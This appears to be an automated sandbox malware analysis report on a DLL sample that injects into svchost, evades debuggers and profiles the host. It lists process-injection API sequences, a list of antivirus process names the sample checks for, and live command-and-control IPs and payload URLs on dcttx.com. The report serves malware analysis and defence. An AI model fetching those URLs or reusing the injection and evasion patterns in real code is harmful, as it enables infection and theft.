Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04208678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0420AFAE SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBDE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DC1EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBEF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC61C22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC616E3 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_03106530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0310AFAE SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_03108678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_031069D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055ADE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055AEF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055B1EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030A6530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030AAFAE SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030A8678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030A69D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0535DE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0535EF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05361EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 38.147.186.138 443
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.204.213.99 7677
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04205830 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05357760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A7760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05357760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05357760 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: rundll32.exe, 00000003.00000002.3545527628.0000000004EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3545452480.0000000005814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3545296964.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager
Source: rundll32.exe, 00000003.00000003.1859849078.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1876997560.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1883764518.0000000006082000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .168.2.4 0 min549163Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB53C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A53C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_053553C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420B587 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0420B587
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC5D95 __lock,wsprintfW,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04DC5D95
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6A00 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,3_2_04DB6A00
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: rundll32.exeBinary or memory string: acs.exe
Source: rundll32.exeBinary or memory string: avcenter.exe
Source: rundll32.exeBinary or memory string: kxetray.exe
Source: rundll32.exeBinary or memory string: vsserv.exe
Source: rundll32.exeBinary or memory string: avp.exe
Source: rundll32.exeBinary or memory string: cfp.exe
Source: rundll32.exeBinary or memory string: KSafeTray.exe
Source: rundll32.exeBinary or memory string: 360Safe.exe
Source: rundll32.exeBinary or memory string: 360tray.exe
Source: rundll32.exeBinary or memory string: rtvscan.exe
Source: rundll32.exeBinary or memory string: TMBMSRV.exe
Source: rundll32.exeBinary or memory string: ashDisp.exe
Source: rundll32.exeBinary or memory string: 360Tray.exe
Source: rundll32.exeBinary or memory string: avgwdsvc.exe
Source: rundll32.exeBinary or memory string: AYAgent.aye
Source: rundll32.exeBinary or memory string: RavMonD.exe
Source: rundll32.exeBinary or memory string: QUHLPSVC.EXE
Source: rundll32.exeBinary or memory string: Mcshield.exe
Source: rundll32.exeBinary or memory string: K7TSecurity.exe
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC4768C bind,GetLastError,3_2_6CC4768C
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 121 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 322 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 17 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 322 Process Injection | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Indicator Removal | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Source | Detection | Scanner | Label
HLMJbase.dll | 0% | ReversingLabs |
HLMJbase.dll | 3% | Virustotal |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dcttx.com | 38.147.186.138 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dcttx.com/19/77.bin | rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2157580790.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2339917557.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1976663029.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699722110.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723632245.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/7.txtFailed | rundll32.exe, rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll | false | | unknown
https://dcttx.com/19/77.bin) | rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/7.txt | rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.bin8 | rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.binf | rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.binD | rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/7.txt) | rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.bin3 | rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.binA | rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.bin_ | rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dcttx.com/19/77.bin. | rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
38.147.186.138 | dcttx.com | United States | 138576 | CODECCLOUD-AS-AP CodecCloud HK Limited HK | true
45.204.213.99 | unknown | Seychelles | 134705 | ITACE-AS-AP Itace International Limited HK | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1579416
                            Start date and time:2024-12-22 09:28:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
Number of new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:HLMJbase.dll
                            Detection:MAL
                            Classification:mal72.spyw.evad.winDLL@10/0@1/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 109
                            • Number of non-executed functions: 91
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CODECCLOUD-AS-AP CodecCloud HK Limited HK | http://www.wagtg.com | malicious | Unknown | 45.152.115.161
 | ULRmk7oYR7.elf | malicious | Mirai | 38.147.162.173
 | file.exe | malicious | Reverse SSH | 45.152.67.101
 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
 | file.exe | malicious | Stealc | 45.152.113.10
 | file.exe | malicious | Stealc | 45.152.113.10
 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
 | file.exe | malicious | Stealc | 45.152.113.10
 | file.exe | malicious | Stealc | 45.152.113.10
ITACE-AS-AP Itace International Limited HK | la.bot.arm7.elf | malicious | Mirai | 154.223.235.4
 | sh4.nn.elf | malicious | Mirai, Okiru | 154.194.197.213
 | sparc.nn.elf | malicious | Mirai, Okiru | 154.91.87.201
 | b3astmode.mpsl.elf | malicious | Mirai | 156.237.86.243
 | ppc.elf | malicious | Mirai | 156.230.199.0
 | hax.mpsl.elf | malicious | Mirai | 156.227.127.152
 | hax.arm5.elf | malicious | Mirai | 156.237.86.244
 | mpsl.elf | malicious | Mirai | 156.235.45.122
 | nshmpsl.elf | malicious | Mirai | 156.235.45.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | swift-bootstrapper.exe | malicious | Unknown | 38.147.186.138
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 38.147.186.138
 | Rechnung736258.pdf.lnk | malicious | LummaC | 38.147.186.138
 | Company Information.pdf.lnk | malicious | Unknown | 38.147.186.138
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 38.147.186.138
 | Fatura227Pendente576.pdf674.msi | malicious | Unknown | 38.147.186.138
                            No context
                            No created / dropped files found
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.62577478877575
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
